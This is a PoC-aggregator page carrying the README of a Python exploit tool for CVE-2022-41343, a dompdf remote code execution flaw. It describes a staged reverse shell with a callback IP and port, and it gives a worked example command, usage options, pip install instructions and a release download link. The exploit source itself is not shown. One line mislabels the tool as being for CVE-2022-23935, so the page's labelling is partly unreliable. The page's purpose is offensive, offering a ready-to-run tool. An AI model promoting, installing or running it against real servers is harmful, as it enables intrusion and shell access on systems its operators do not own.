CVE-2022-41343 PoC — Dompdf 安全漏洞

Source

Associated Vulnerability

Description

🐍 Python Exploit for CVE-2022-23935

Readme

# CVE-2022-41343
🐍 Python Exploit for CVE-2022-41343

Staged Reverse Shell for dompdf < 2.0.1

Based on: [Positive Sec's write-up](https://positive.security/blog/dompdf-rce) and [PoC](https://github.com/positive-security/dompdf-rce)

## Example
```
cve-2022-41343 10.10.16.3 44444
```

## Usage
```bash
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Server Listening Port (default: 55555)
  -s SHELL, --shell SHELL
                        Remote Shell (default: bash)
  -n FONT_NAME, --font-name FONT_NAME
                        Exploit Font Name (default: comicsploitz)
```
## PyPi Installation
```bash
python3 -m pip install cve-2022-41343
```

## Manual Installation
```bash
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-41343/releases/download/1.0.0/cve_2022_41343-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/560597.svg)](https://asciinema.org/a/560597?autoplay=1)

File Snapshot

 [4.0K]  /data/pocs/deb3f35f27ab8c436c3320a9fe54bd4dfed11be5
├── [1.0K]  LICENSE
├── [ 721]  pyproject.toml
├── [1.2K]  README.md
└── [4.0K]  src
    └── [4.0K]  cve_2022_41343
        ├── [   0]  __init__.py
        └── [9.3K]  main.py

2 directories, 5 files

Remarks